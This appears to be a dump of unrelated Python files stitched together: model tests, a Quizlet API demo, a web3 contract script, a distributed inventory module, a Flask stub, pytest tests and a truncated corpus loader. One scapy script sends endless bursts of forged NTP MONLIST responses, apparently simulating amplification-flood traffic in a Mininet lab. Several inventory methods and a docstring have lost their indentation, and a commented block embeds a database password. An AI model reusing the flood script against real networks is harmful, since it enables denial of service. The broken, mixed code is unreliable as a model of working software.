    ``channel_data`` is a pytest fixture (presumably seeds the DB — confirm).
    """
    channel = Channel(
        owner_id=1,
        name='General')
    channel = await channel.create()
    assert repr(channel) == "<Channel: 'General'>"
async def test_channel_user_model(channel_data):
    """Creating a ChannelUser persists it and repr() shows user/channel ids."""
    channel_user = ChannelUser(
        user_id=1,
        channel_id=1)
    channel_user = await channel_user.create()
    assert repr(channel_user) == "<ChannelUser: 1 1>"
async def test_message_model(message_data):
    """Creating a Message persists it and repr() shows its id.

    ``message_data`` is a pytest fixture (presumably seeds the DB — confirm).
    """
    message = Message(
        author_id=1,
        channel_id=1,
        content='General')
    message = await message.create()
    assert repr(message) == "<Message: {}>".format(message.id)
|
import json
import quizlet_api_wrapper
class QuizletApiUtilities:
    """Helpers for pulling ids out of Quizlet API JSON responses."""
    # BUG FIX: these were plain defs without ``self``; calling them on an
    # instance would fail.  @staticmethod keeps class-level calls working
    # and makes instance-level calls valid too.
    @staticmethod
    def get_new_set_id(json_string):
        """Return the ``set_id`` field from a create_new_set() JSON response."""
        datastore = json.loads(json_string)
        return datastore['set_id']
    @staticmethod
    def get_new_term_id(json_string):
        """Return the ``id`` field from an add_single_term() JSON response."""
        datastore = json.loads(json_string)
        return datastore['id']
class UsingQuizletApiWrapper:
    # NOTE(review): everything below runs in the CLASS BODY, i.e. at import
    # time — every API call fires as soon as this module is imported.
    # Consider moving this walkthrough into a method or a __main__ guard.
    qz_api_instance = quizlet_api_wrapper.QuizletApiClass()
    # read necessary credentials from private_creds.json
    qz_api_instance.read_creds()
    # get read and write access tokens
    qz_api_instance.fetch_read_write_access_token_from_cache()
    # create new set
    list_of_definition = [('term1', 'def1'), ('term2', 'def2'), ('term3', 'def3')]
    new_set_json_string = qz_api_instance.create_new_set(term_def_list=list_of_definition)
    print(new_set_json_string)
    new_set_id = QuizletApiUtilities.get_new_set_id(new_set_json_string)  # fetch new set_id from json response
    # fetch terms from set
    print(qz_api_instance.fetch_terms_from_a_set(new_set_id))
    # fetch terms along with additional details from a set
    print(qz_api_instance.fetch_all_details_from_a_set(new_set_id))
    # add a new term to a set
    new_term_json_string = qz_api_instance.add_single_term(set_id=new_set_id, term='term4', definition='definition4')
    new_term_id = QuizletApiUtilities.get_new_term_id(new_term_json_string)  # get term_id of a new term added
    print(new_term_id)
    # edit a single term
    print(qz_api_instance.edit_single_term(set_id=new_set_id, term_id=str(new_term_id)))
    # delete a single term from a set
    print(qz_api_instance.delete_single_term(set_id=new_set_id, term_id=new_term_id))  # first create a term to delete
    # fetch minimal details of a user
    print(qz_api_instance.fetch_minimal_user_details(qz_api_instance.USERNAME))
    # delete whole set
    print(qz_api_instance.delete_set(new_set_id))
    # print(x.edit_whole_set(set_id=299289740, title='My second set via api', term_def_list=list_of_definition ))
|
import json
import web3
from web3 import Web3
from contracts.packer import *
address_deployed_contract = '0xbDaAe5285BEE72Ac7DEfaD987A8d67C36cde612f'
def getw3():
    """Return a Web3 handle connected to the local JSON-RPC node."""
    #target = 'http://172.13.0.2:8545'
    target = 'http://127.0.0.1:8545'
    w3 = Web3(Web3.HTTPProvider(target))
    assert w3.isConnected(), 'node not connected at {}'.format(target)
    return w3
def getPacker():
    """Return (w3, Packer) for the SimpleCounter contract."""
    w3 = getw3()
    return (w3, Packer(w3, 'SimpleCounter', 'contracts/simplecounter.sol'))
def deployibit():
    """Deploy the SimpleCounter contract from accounts[0] and print its balance."""
    w3, packer = getPacker()
    deployed = packer.deploy_now(w3.eth.accounts[0])
    #reader = packer.get_concise_instance(deployed)
    print('11 [{}]'.format(deployed.functions.getBalance().call()))
    # print('12 [{}]'.format(reader.getBalance()))
def checkibit():
    """Read the counter's balance via both the full and the concise instance."""
    w3, packer = getPacker()
    deployed = packer.from_deployed_instance(address_deployed_contract)
    reader = packer.get_concise_instance(address_deployed_contract)
    print('61 [{}]'.format(deployed.functions.getBalance().call()))
    print('62 [{}]'.format(reader.getBalance()))
def updateibit(params):
    """Call update(params[0]) on the deployed contract and print the new balance.

    ``params`` is a tuple; only its first element is used.  Blocks until the
    transaction is mined.
    """
    w3, packer = getPacker()
    deployed = packer.from_deployed_instance(address_deployed_contract)
    reader = packer.get_concise_instance(address_deployed_contract)
    # params = (3200,)
    # print('params:', params)
    # packer.update_function(deployed, 'createNote', params[0], params[1])
    w3.eth.defaultAccount = w3.eth.accounts[0]
    txhash = deployed.functions.update(params[0])
    txhash = txhash.transact()
    # Wait for the transaction to be mined before reading the balance back.
    w3.eth.waitForTransactionReceipt(txhash)
    print('81 [{}]'.format(deployed.functions.getBalance().call()))
    print('82 [{}]'.format(reader.getBalance()))
# Script entry: inspect the deployed counter, then set it via update(323).
#deployibit()
checkibit()
updateibit( (323,) )
|
from media import Movie
def generate_movies(codes):
"""Takes a dictionary of IMDB movie codes, generates their associated movie
objects and generates the Fresh Tomatoes site with that data.
Args:
codes (dict): A dictionary of codes with the following format
"Movie Name": "imdb_code",
"The Martian": "tt3659388"
Returns:
A list of movie objects
"""
movies = []
for k, v in codes.iteritems():
movies.append(Movie.from_code(v))
return movies
|
#
#Copyright (c) 2018 Jie Zheng
#
import queue
import traceback
from e3net.common.e3keeper import root_keeper
from pysyncobj import SyncObj
from pysyncobj import SyncObjConf
from pysyncobj import replicated
from e3net.common.e3rwlock import e3rwlock
from e3net.common.e3log import get_e3loger
from e3net.common.e3config import get_config
from e3net.common.e3exception import e3_exception
from e3net.common.e3exception import E3_EXCEPTION_IN_USE
from e3net.common.e3exception import E3_EXCEPTION_NOT_FOUND
from e3net.common.e3exception import E3_EXCEPTION_INVALID_ARGUMENT
from e3net.common.e3exception import E3_EXCEPTION_OUT_OF_RESOURCE
from e3net.common.e3exception import E3_EXCEPTION_NOT_SUPPORT
from e3net.common.e3exception import E3_EXCEPTION_BE_PRESENT
from e3net.common.e3exception import E3_EXCEPTION_NOT_SUCCESSFUL
from e3net.common.e3exception import E3_EXCEPTION_NOT_READY
from e3net.db.db_vswitch_host import db_register_e3vswitch_host
from e3net.db.db_vswitch_interface import db_register_e3vswitch_interface
from e3net.db.db_vswitch_lan_zone import db_register_e3vswitch_lanzone
from e3net.db.db_cas_role import db_register_role
from e3net.db.db_cas_tenant import db_register_tenant
from e3net.db.db_cas_token import db_register_token
from e3net.db.db_vswitch_ether_service import db_register_vswitch_ether_service
from e3net.db.db_vswitch_topology import db_register_vswitch_topology_edge
from e3net.db.db_vswitch_ether_service_vlan import db_register_vswitch_ether_service_vlan
# Maps an inventory root_key (table name) to the DB function that creates
# a row of that kind; used by inventory_base.register_object().
# (The name keeps the original "registery" spelling for compatibility.)
dispatching_for_registery = {
    'vswitch_host': db_register_e3vswitch_host,
    'vswitch_interface': db_register_e3vswitch_interface,
    'vswitch_lan_zone': db_register_e3vswitch_lanzone,
    'role': db_register_role,
    'tenant': db_register_tenant,
    'token': db_register_token,
    'ether_service': db_register_vswitch_ether_service,
    'topology_edge': db_register_vswitch_topology_edge,
    'ether_service_vlan': db_register_vswitch_ether_service_vlan
}
from e3net.db.db_vswitch_host import db_update_e3vswitch_host
from e3net.db.db_vswitch_lan_zone import db_update_e3vswitch_lanzone
from e3net.db.db_vswitch_interface import db_update_e3vswitch_interface
from e3net.db.db_cas_role import db_update_role
from e3net.db.db_cas_tenant import db_update_tenant
from e3net.db.db_cas_token import db_update_token
# Maps root_key -> DB update function; used by inventory_base.update_object().
# Note: fewer kinds than registration — services/edges/vlans are immutable here.
dispatching_for_update = {
    'vswitch_host': db_update_e3vswitch_host,
    'vswitch_interface': db_update_e3vswitch_interface,
    'vswitch_lan_zone': db_update_e3vswitch_lanzone,
    'role': db_update_role,
    'tenant': db_update_tenant,
    'token': db_update_token
}
from e3net.db.db_vswitch_host import db_get_e3vswitch_host
from e3net.db.db_vswitch_interface import db_get_e3vswitch_interface
from e3net.db.db_vswitch_lan_zone import db_get_e3vswitch_lanzone
from e3net.db.db_cas_role import db_get_role
from e3net.db.db_cas_tenant import db_get_tenant
from e3net.db.db_cas_token import db_get_token
from e3net.db.db_vswitch_ether_service import db_get_vswitch_ether_service
from e3net.db.db_vswitch_topology import db_get_vswitch_topology_edge
from e3net.db.db_vswitch_ether_service_vlan import db_get_vswitch_ether_service_vlan
# Maps root_key -> DB getter; used by inventory_base.get_object() on cache miss.
dispatching_for_retrieval = {
    'vswitch_host': db_get_e3vswitch_host,
    'vswitch_interface': db_get_e3vswitch_interface,
    'vswitch_lan_zone': db_get_e3vswitch_lanzone,
    'role': db_get_role,
    'tenant': db_get_tenant,
    'token': db_get_token,
    'ether_service': db_get_vswitch_ether_service,
    'topology_edge': db_get_vswitch_topology_edge,
    'ether_service_vlan': db_get_vswitch_ether_service_vlan
}
from e3net.db.db_vswitch_host import db_unregister_e3vswitch_host
from e3net.db.db_vswitch_interface import db_unregister_e3vswitch_interface
from e3net.db.db_vswitch_lan_zone import db_unregister_e3vswitch_lanzone
from e3net.db.db_cas_role import db_unregister_role
from e3net.db.db_cas_tenant import db_unregister_tenant
from e3net.db.db_cas_token import db_unregister_token
from e3net.db.db_vswitch_ether_service import db_unregiser_vswitch_service
from e3net.db.db_vswitch_topology import db_unregister_vswitch_topology_edge
from e3net.db.db_vswitch_ether_service_vlan import db_unregister_vswitch_ether_service_vlan
# Maps root_key -> DB delete function; used by inventory_base.unregister_object().
dispatching_for_deletion = {
    'vswitch_host': db_unregister_e3vswitch_host,
    'vswitch_interface': db_unregister_e3vswitch_interface,
    'vswitch_lan_zone': db_unregister_e3vswitch_lanzone,
    'role': db_unregister_role,
    'tenant': db_unregister_tenant,
    'token': db_unregister_token,
    'ether_service': db_unregiser_vswitch_service,
    'topology_edge': db_unregister_vswitch_topology_edge,
    'ether_service_vlan': db_unregister_vswitch_ether_service_vlan
}
# Converts a sub_key into the kwargs expected by the db_* helpers above;
# every table currently keys its objects by uuid.
sub_key_to_args={
    'vswitch_host':lambda x:{'uuid':x},
    'vswitch_interface':lambda x:{'uuid':x},
    'vswitch_lan_zone':lambda x:{'uuid':x},
    'role':lambda x:{'uuid':x},
    'tenant':lambda x:{'uuid':x},
    'token':lambda x:{'uuid':x},
    'ether_service':lambda x:{'uuid':x},
    'topology_edge':lambda x:{'uuid':x},
    'ether_service_vlan':lambda x:{'uuid':x}
}
# Default raft-cluster addresses (no peers).  NOTE(review): presumably
# overridden via e3config at runtime — only the literal default is visible here.
cluster_conf = {
    'cluster': {
        'local_address': 'localhost:8333',
        'peer_addresses': ''
    }
}
# Backlog of replicated events (filled by inventory_base.notify_event,
# consumed elsewhere).
_event_queue = queue.Queue()
#
#root_key as the table name
#sub_key as object name
#right here we also implement distributed lock primitive
#
e3loger = get_e3loger('e3vswitch_controller')
class inventory_base(SyncObj):
    def __init__(self, selfaddr, otheraddress, conf=None):
        """Initialise the replicated inventory node.

        selfaddr/otheraddress/conf are forwarded unchanged to
        pysyncobj.SyncObj.
        """
        # a dictionary which contains tuple <lockpath, expiry-time>
        self._locks = dict()
        self._lock_native_guard = e3rwlock()
        super(inventory_base, self).__init__(selfaddr, otheraddress, conf)
    # Put an event into the event backlog queue (replicated on all nodes).
    @replicated
    def notify_event(self, event):
        """Append *event* to the module-level backlog queue.

        Returns (True, None) on success, or (False, reason) while the
        raft synchronisation state is not yet ready.
        """
        if self._isReady() is True:
            _event_queue.put(event)
            return True, None
        else:
            return False, 'sync state not ready'
    #
    #the raw subject manipulation
    #
    @replicated
    def set_raw_object(self, root_key, sub_key, raw_obj):
        """Store *raw_obj* under <root_key, sub_key> in the keeper
        (replicated).  Returns (True, None) or (False, reason/exception)."""
        if self._isReady() is False:
            e3loger.warning('synchronization state not ready')
            return False, 'sync base not ready'
        try:
            root_keeper.set(root_key, sub_key, raw_obj, True)
            e3loger.info('set raw object for <%s,%s> as %s' %
                         (root_key, sub_key, raw_obj))
            return True, None
        except Exception as e:
            e3loger.error('failed to set raw object for <%s,%s>' % (root_key,
                                                                    sub_key))
            return False, e
def get_raw_object(self, root_key, sub_key):
try:
obj, valid = root_keeper.get(root_key, sub_key)
return valid, obj if valid else 'not valid sub_key or something else gets wrong'
except Exception as e:
e3loger.error(
'failed to retrieve raw object <%s,%s> with exception:' %
(root_key, sub_key, str(traceback.format_exc())))
return False, e
    def list_raw_objects(self, root_key):
        """Return (True, {sub_key: (ok, obj_or_error)}) for every key under
        *root_key*, or (False, exception) if the listing itself fails."""
        ret = dict()
        try:
            sub_lst = root_keeper.list(root_key)
            for sub_key in sub_lst:
                ret[sub_key] = self.get_raw_object(root_key, sub_key)
            return True, ret
        except Exception as e:
            e3loger.error(str(traceback.format_exc()))
            return False, e
@replicated
def unset_raw_object(self, root_key, sub_key):
if self._isReady() is False:
e3loger.warning('synchronization state not ready')
return False, 'sync base not ready'
try:
root_keeper.unset(root_key, sub_key)
e3loger.info('unset raw object <%s,%s>' % (root_key, sub_key))
return True, None
except Exception as e:
e3loger.error(
'failed yo unset raw object <%s,%s> with exception:%s' %
(root_key, sub_key, str(traceback.format_exc())))
return False, e
    #
    #the non-replicated methods are stateful,
    #usually a database operation is involved
    #we use to_key() of the registered object to determine sub_key
    #
    def register_object(self,
                        root_key,
                        fields_create_dict,
                        user_callback=None,
                        user_sync=False,
                        user_timeout=30):
        """Create a new object of kind *root_key* in the database, then
        replicate a cache-invalidation via register_or_update_object_post.

        Returns the freshly created DB object; raises on any failure.
        """
        if self._isReady() is False:
            e3loger.warning('synchronization state not ready')
            raise e3_exception(E3_EXCEPTION_NOT_SUPPORT, 'sync base not ready')
        try:
            obj = dispatching_for_registery[root_key](fields_create_dict)
            assert (obj)
            e3loger.debug(
                'invoking register_or_update_object_post for <%s:%s>' %
                (root_key, obj))
            # callback/sync/timeout are pysyncobj's @replicated kwargs; the
            # user_ prefixed variants exist to dodge a pysyncobj limitation
            # (see the note above unregister_object).
            self.register_or_update_object_post(
                root_key,
                obj.to_key(),
                True,
                callback=user_callback,
                sync=user_sync,
                timeout=user_timeout)
            return obj
        except Exception as e:
            e3loger.error('with given root_key:%s and create_dict:%s' %
                          (str(root_key), str(fields_create_dict)))
            e3loger.error(str(traceback.format_exc()))
            raise e
    def update_object(self,
                      root_key,
                      sub_key,
                      fields_change_dict,
                      user_callback=None,
                      user_sync=False,
                      user_timeout=30):
        """Apply *fields_change_dict* to the object at <root_key, sub_key>
        in the database, then replicate a cache-invalidation.

        Raises on any failure (not-ready state or DB error).
        """
        if self._isReady() is False:
            e3loger.warning('synchronization state not ready')
            raise e3_exception(E3_EXCEPTION_NOT_SUPPORT, 'sync base not ready')
        try:
            args = sub_key_to_args[root_key](sub_key)
            args['fields_change_dict'] = fields_change_dict
            dispatching_for_update[root_key](**args)
            e3loger.debug(
                'invoking register_or_update_object_post for <%s:%s>' %
                (root_key, sub_key))
            self.register_or_update_object_post(
                root_key,
                sub_key,
                True,
                callback=user_callback,
                sync=user_sync,
                timeout=user_timeout)
        except Exception as e:
            e3loger.error(
                'with given root_key:%s sub_key:%s and fields_change_dict:%s' %
                (str(root_key), str(sub_key), str(fields_change_dict)))
            e3loger.error(str(traceback.format_exc()))
            raise e
    @replicated
    def register_or_update_object_post(self, root_key, sub_key, success):
        """Replicated post-hook for create/update: on success, invalidate the
        node-local cached copy (or plant an invalid placeholder slot) so the
        next get_object() refetches from the backing store."""
        e3loger.debug('post registery call:<%s,%s> %s' % (root_key, sub_key,
                                                          success))
        if success:
            obj, valid = root_keeper.get(root_key, sub_key)
            if valid:
                root_keeper.invalidate(root_key, sub_key)
            else:
                root_keeper.set(root_key, sub_key, None, False)
def get_object(self, root_key, sub_key):
try:
obj, valid = root_keeper.get(root_key, sub_key)
if not valid:
obj = dispatching_for_retrieval[root_key](
**sub_key_to_args[root_key](sub_key))
#if the object can not be retrieved, an exception must be thrown
#anyway add an assertion here for sanity check purpose
assert (obj)
root_keeper.set(root_key, sub_key, obj, True)
return obj
except Exception as e:
e3loger.error('with given root_key:%s,sub_key:%s' % (str(root_key),
str(sub_key)))
e3loger.error(str(traceback.format_exc()))
raise e
def list_objects(self, root_key):
ret = dict()
sub_lst = root_keeper.list(root_key)
for sub_key in sub_lst:
try:
obj = self.get_object(root_key, sub_key)
ret[sub_key] = obj
except:
pass
return ret
    '''
    https://github.com/bakwc/PySyncObj/issues/76
    There is no known way to get the information of whether this is a
    synchronous invocation or whether the callback is set. To work around
    this, the user_-prefixed callback and sync parameters are introduced.
    Callers should normally specify user_callback instead of callback,
    and when performing this operation synchronously, specify both user_sync and sync.
    Update: do not use user_sync, as it will cause errors;
    use user_callback instead of callback.
    '''
    def unregister_object(self,
                          root_key,
                          sub_key,
                          user_callback=None,
                          user_sync=False,
                          user_timeout=30):
        """Delete the object <root_key, sub_key> from the backing store, then
        replicate unregister_object_post so every node drops its cached copy.

        Logs and re-raises any failure from the deletion dispatcher.
        """
        if self._isReady() is False:
            e3loger.warning('synchronization state not ready')
            raise e3_exception(E3_EXCEPTION_NOT_SUPPORT,
                               'synchronization state not ready')
        try:
            dispatching_for_deletion[root_key](
                **sub_key_to_args[root_key](sub_key))
            #if no exception thrown,things go normal
            #try to invoke another post callback with the same manner
            e3loger.debug('invoking unregister_object_post for<%s,%s>' %
                          (root_key, sub_key))
            self.unregister_object_post(
                root_key,
                sub_key,
                callback=user_callback,
                sync=user_sync,
                timeout=user_timeout)
        except Exception as e:
            e3loger.error('with given root_key:%s,sub_key:%s ' %
                          (str(root_key), str(sub_key)))
            e3loger.error(str(traceback.format_exc()))
            raise e
    @replicated
    def unregister_object_post(self, root_key, sub_key):
        """Replicated post-hook for deletion: drop the node-local cache slot."""
        e3loger.debug('unset<%s,%s>' % (root_key, sub_key))
        root_keeper.unset(root_key, sub_key)
    #
    #distributed lock implementation
    #use the caller's time to synchronize the lock, DO NOT use the local time,
    #because different nodes' clocks are not the same.
    #this was a hard-learned LESSON: use an NTP service to keep the nodes' clocks almost in sync.
    #
    @replicated
    def acquire_lock(self, lock_path, caller_id, current_time, lock_duration):
        """Replicated distributed-lock acquisition.

        Grants (or re-entrantly renews) *lock_path* for *caller_id* until
        current_time + lock_duration.  The caller supplies *current_time* so
        every node evaluates expiry against the same clock (see the NTP note
        above).  Returns True on success, False otherwise.
        """
        try:
            self._lock_native_guard.write_lock()
            lock = self._locks.get(lock_path, None)
            lock_id = None
            expiry_time = 0
            #release previous in case of expiry
            if lock:
                lock_id, expiry_time = lock
                if expiry_time < current_time:
                    lock = None
            # Free, expired, or held by the same caller: grant/extend.
            if not lock or lock_id == caller_id:
                self._locks[lock_path] = (caller_id,
                                          current_time + lock_duration)
            else:
                raise e3_exception(E3_EXCEPTION_NOT_SUCCESSFUL)
            return True
        except Exception as e:
            e3loger.debug(
                'failed to lock:%s as caller_id:%s with exception:%s' %
                (lock_path, caller_id, str(e)))
            return False
        finally:
            self._lock_native_guard.write_unlock()
#
#if no exception was raised, the lock_path is acquired,
#otherwise an E3_EXCEPTION_NOT_READY exception was thrown
def is_locked(self, lock_path, caller_id, current_time):
try:
self._lock_native_guard.read_lock()
lock = self._locks.get(lock_path, None)
if lock:
lock_id, expiry_time = lock
if lock_id == caller_id and expiry_time > current_time:
return True
raise e3_exception(E3_EXCEPTION_NOT_READY)
except:
return False
finally:
self._lock_native_guard.read_unlock()
    #
    #no exception is exposed;
    #it is supposed to always succeed,
    #and the returned value usually has significant meaning
@replicated
def release_lock(self, lock_path, caller_id):
try:
self._lock_native_guard.write_lock()
lock = self._locks.get(lock_path, None)
if not lock:
return False
lock_id, expiry_time = lock
if lock_id == caller_id:
del self._locks[lock_path]
return True
return False
except Exception as e:
return False
finally:
self._lock_native_guard.write_unlock()
# Module-level singleton holding the running inventory service.
invt_base = None


def e3inventory_base_init():
    """Read local/peer addresses from the cluster config and instantiate the
    module-level inventory_base singleton."""
    global invt_base
    local = get_config(cluster_conf, 'cluster', 'local_address').strip()
    raw_peers = get_config(cluster_conf, 'cluster', 'peer_addresses')
    # Comma-separated peer list; drop empty fragments.
    peer = [addr.strip() for addr in raw_peers.split(',') if addr.strip()]
    e3loger.info(
        'try to instantiate inventory service with local:%s and peer(s):%s' %
        (local, peer))
    invt_base = inventory_base(local, peer)


def get_inventory_base():
    """Return the singleton (None before e3inventory_base_init ran)."""
    return invt_base
if __name__ == '__main__':
    # Smoke test: load the vswitch configuration and bring up the service.
    from e3net.common.e3config import add_config_file
    from e3net.common.e3config import load_configs
    add_config_file('/etc/e3net/e3vswitch.ini')
    load_configs()
    e3inventory_base_init()
    # The block below is an older, database-backed manual test kept for
    # reference (note: it registers the same object once per second).
    '''
    from e3net.db.db_base import init_database
    from e3net.db.db_base import create_database_entries
    DB_NAME='E3NET_VSWITCH'
    init_database(DB_NAME,'mysql+pymysql://e3net:e3credientials@localhost/E3NET_VSWITCH',False)
    base=inventory_base('localhost:507',[])
    import time
    while True:
        time.sleep(1)
        arg=dict()
        arg['ip']='130.140.150.1'
        arg['hostname']='server'
        print(base.register_object('vswitch_host','container_host1',**arg))
    '''
|
import os
from flask import Flask, request, jsonify
app = Flask(__name__)


@app.route('/')
def hello_world():
    """Root endpoint: return a static greeting."""
    return 'Hello World from Flask!'


# Port comes from the environment (PaaS convention), defaulting to 8000.
port = int(os.getenv('PORT', 8000))

if __name__ == '__main__':
    app.run(debug=False, host='0.0.0.0', port=port)
|
from math import ceil
# Read competitor counts until a 0 sentinel; for each, print how many
# three-way races are needed to decide a winner.
while True:
    competidores = int(input())
    if competidores == 0:
        break
    if competidores == 1:
        # A single competitor races nobody.
        print(0)
        continue
    # Each round runs ceil(remaining/3) races and advances that many winners.
    restantes = competidores / 3
    corridas = ceil(restantes)
    while restantes > 1:
        restantes /= 3
        corridas += ceil(restantes)
    print(corridas)
|
#!/usr/bin/python
from scapy.all import Ether, IP, sendp, get_if_hwaddr, get_if_list, TCP, Raw, UDP, NTP, fuzz
import sys
import time
import random, string
import socket
import fcntl
import struct
def randomword(max_length):
    """Return a random lowercase ASCII word of length 1..max_length inclusive.

    Uses string.ascii_lowercase instead of the Python-2-only (and
    locale-dependent) string.lowercase: identical output under the C locale,
    and it also works on Python 3.
    """
    length = random.randint(1, max_length)
    return ''.join(random.choice(string.ascii_lowercase) for i in range(length))
def set_payload(length):
    """Return a random lowercase ASCII payload of exactly *length* characters.

    string.ascii_lowercase replaces the Python-2-only string.lowercase
    (same characters under the C locale, Python-3 compatible).
    """
    return ''.join(random.choice(string.ascii_lowercase) for i in range(length))
def gen_random_ip():
    """Return a random dotted-quad IPv4 address as a string."""
    octets = [str(random.randint(0, 255)) for _ in range(4)]
    return ".".join(octets)
def get_ip_address(ifname):
    """Return the IPv4 address bound to interface *ifname* (e.g. 'eth0').

    Issues the SIOCGIFADDR ioctl on a throwaway UDP socket (Linux-only).
    NOTE(review): Python-2-era code — on Python 3, struct.pack('256s', ...)
    requires bytes, so ifname would need to be encoded first; confirm the
    interpreter this runs under.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', ifname[:15])
    )[20:24])
def send_random_traffic(src_switch, src_host, dst_switch, dst_host, timeout, loop):
    """Continuously send forged NTP MONLIST response packets between two
    Mininet-style hosts (10.0.<switch>.<host> addressing).

    Fixes vs original: Python-2 print statements converted to print() calls
    (same output on both interpreters) and the ten copy-pasted sendp() calls
    collapsed into a loop.  Runs forever; sleeps *timeout* seconds between
    bursts.
    """
    NTP_ITEMS = "\x06"
    NTP_ITEMS_INT = 6
    NTP_MONLIST_RESPONSE = "\xd7\x00\x03\x2a" + "\x00" + NTP_ITEMS + "\x00\x48" + "\x00" * 72 * NTP_ITEMS_INT
    src_host_in_hex = '{:02x}'.format(int(src_host))
    dst_host_in_hex = '{:02x}'.format(int(dst_host))
    src_mac = '00:00:00:00:0' + src_switch + ':' + src_host_in_hex
    src_ip = '10.0.' + src_switch + '.' + src_host
    dst_mac = '00:00:00:00:0' + dst_switch + ':' + dst_host_in_hex
    dst_ip = '10.0.' + dst_switch + '.' + dst_host
    print('From:\n ' + src_mac)
    print(' ' + src_ip)
    print('To:\n ' + dst_mac)
    print(' ' + dst_ip)
    # Pick the first interface that looks like eth0 (or an s0 switch port).
    iface_eth0 = ''
    for i in get_if_list():
        if 'eth0' in i or 's0' in i:
            iface_eth0 = i
    while True:
        # 10 packets x 6 items x 72 bytes = 4320 data bytes per burst
        p = Ether(dst=dst_mac, src=src_mac) / IP(dst=dst_ip, src=src_ip)
        p = p / UDP(dport=123, sport=123) / Raw(NTP_MONLIST_RESPONSE)
        for _ in range(10):
            sendp(p, iface=iface_eth0, loop=loop, verbose=0)
        time.sleep(timeout)
if __name__ == '__main__':
    # CLI: accept either raw numbers or Mininet-style names (s1/h2).
    if len(sys.argv) < 6:
        print("Usage: python send.py src_switch src_host dst_switch dst_host time [loop]<0|1>")
        sys.exit(1)
    else:
        src_switch = sys.argv[1]
        if 's' in src_switch:
            src_switch = sys.argv[1].split('s')[1]
        src_host = sys.argv[2]
        if 'h' in src_host:
            src_host = sys.argv[2].split('h')[1]
        dst_switch = sys.argv[3]
        if 's' in dst_switch:
            dst_switch = sys.argv[3].split('s')[1]
        dst_host = sys.argv[4]
        if 'h' in dst_host:
            # BUG FIX: this previously overwrote dst_switch instead of
            # dst_host, corrupting both destination fields.
            dst_host = sys.argv[4].split('h')[1]
        timeout = float(sys.argv[5])
        loop = 1
        if len(sys.argv) > 6:
            loop = int(sys.argv[6])
        send_random_traffic(src_switch, src_host, dst_switch, dst_host, timeout, loop)
|
#!/usr/bin/env python3
from loadCOLOR import load_color
from LOGClassify import log_energy, log_classify
# could really just use pickle here instead of numpy
import numpy
from viewCLASSES import view_classes
# Fit (or load cached) logistic classifiers for several regularization
# strengths, record their final energies, and render per-class views.
img, X, Xtrain, y = load_color()
# (lambda, pickle-file) pairs: one cached fit per regularization strength.
lambdapickles = [ ( .005,'color_005.pickle'),
                  (.05, 'color_05.pickle'),
                  (.5, 'color_5.pickle'),
                  ]
energy_lines = []
for lamb, picklefile in lambdapickles:
    try:
        # Cached parameters: all leading entries are beta, the last is alpha.
        *beta, alpha = numpy.load(picklefile)
    except FileNotFoundError:
        print("no pickle :(")
        # the pickle doesn't exist, so make it
        alpha, beta = log_classify(Xtrain, y, lamb)
        to_pickle = list(beta) + [alpha]
        to_pickle = numpy.array(to_pickle)
        to_pickle.dump(picklefile)
        print("made pickle")
    beta = numpy.array(beta)
    E = log_energy(alpha, beta, Xtrain, y, lamb)
    energy_lines.append('λ={}\t'.format(lamb))
    #print('found α: {}'.format(alpha))
    #print('found β: {}'.format(beta))
    energy_lines.append("final energy is {}\n".format(E))
    # Score the full image and save the class visualization.
    Y = alpha + numpy.dot(X,beta)
    view_classes(img,Y,lamb,save=True)
with open('c3_1.txt', 'w') as f:
    f.writelines(energy_lines)
|
import pytest
from PlayerRepository import PlayerRepository
from gamecomponents import PlayerInfo
# Shared fixtures; rebuilt before every test by the autouse fixture below.
repo = None
p1, p2 = None, None
@pytest.fixture(autouse=True)
def initPlayers():
    """Reset the repository with two players (sigma 3 and 5) before each test."""
    global repo, p1, p2
    p1, p2 = PlayerInfo("1"), PlayerInfo("2")
    p1.sigma = 3
    p2.sigma = 5
    repo = PlayerRepository()
    repo.setPlayers([p1, p2])
def test_remove_worst_players_too_low_sigma():
    """minSigma below both players' sigma values: nobody is removed."""
    removed = repo.removeWorstPlayers(quantile=1, minSigma=2)
    assert len(removed) == 0
    assert len(repo.fetchPlayers()) == 2
def test_remove_worst_players_too_middle_sigma():
    """minSigma between the two sigmas (3 < 4 < 5): exactly one player goes."""
    removed = repo.removeWorstPlayers(quantile=1, minSigma=4)
    assert len(removed) == 1
    assert len(repo.fetchPlayers()) == 1
def test_remove_worst_players_too_big_sigma():
    """minSigma above both sigmas: both players are removed."""
    removed = repo.removeWorstPlayers(quantile=1, minSigma=6)
    assert len(removed) == 2
    assert len(repo.fetchPlayers()) == 0
def test_remove_worst_players_too_big_sigma_but_limited_amount_should_remove_worst_player():
    """Both qualify on sigma, but quantile=0.5 caps removals at one player;
    only the worst-ranked (p1, rank 30) is removed and p2 remains."""
    p1.rank = 30
    p2.rank = 40
    removed = repo.removeWorstPlayers(quantile=0.5, minSigma=6)
    assert len(removed) == 1
    assert len(repo.fetchPlayers()) == 1
    assert repo.fetchPlayers() == [p2]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Created by weihang huang on 17-11-18
import sys
import os
import numpy as np
from collections import Counter
# Python-2-only hack: reload() re-exposes sys.setdefaultencoding so all
# implicit str<->unicode conversions use UTF-8.
reload(sys)
sys.setdefaultencoding('utf-8')
# Project root: one directory above this script's directory.
root = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/"
def create_dataset(in_file, max_size):
    """Build index mappings and index sequences from a tagged corpus.

    Each input line has the form "<tags> __content__ <sentence>".

    Fixes vs original: map()/filter()/dict.iteritems() were Python-2 only
    (lazy iterators / removed method on Python 3) — replaced with
    comprehensions and .items(), which behave identically on Python 2 as
    well; the input file is now closed via a with-block.

    Args:
        in_file: path to the corpus file.
        max_size: minimum occurrence count for a sentence word to enter the
            vocabulary (rarer words map to <ukn>, index 0).

    Returns:
        (x, y, sent_word2idx, sent_idx2word, sent_vocab,
         tag_word2idx, tag_idx2word, tag_vocab)
    """
    sent_line, tag_line = [], []
    with open(in_file, 'r') as fin:
        for line in fin:
            sent_tag = line.split("__content__")
            sent_line.append(sent_tag[1].strip())
            tag_line.append(sent_tag[0].strip())
    sent_vocab_dict = Counter(word for sentence in sent_line for word in sentence.split())
    tag_vocab_dict = Counter(word for sentence in tag_line for word in sentence.split())
    # Most-frequent-first; keep only sentence words seen >= max_size times.
    sent_vocab_cnt = [(w, c)
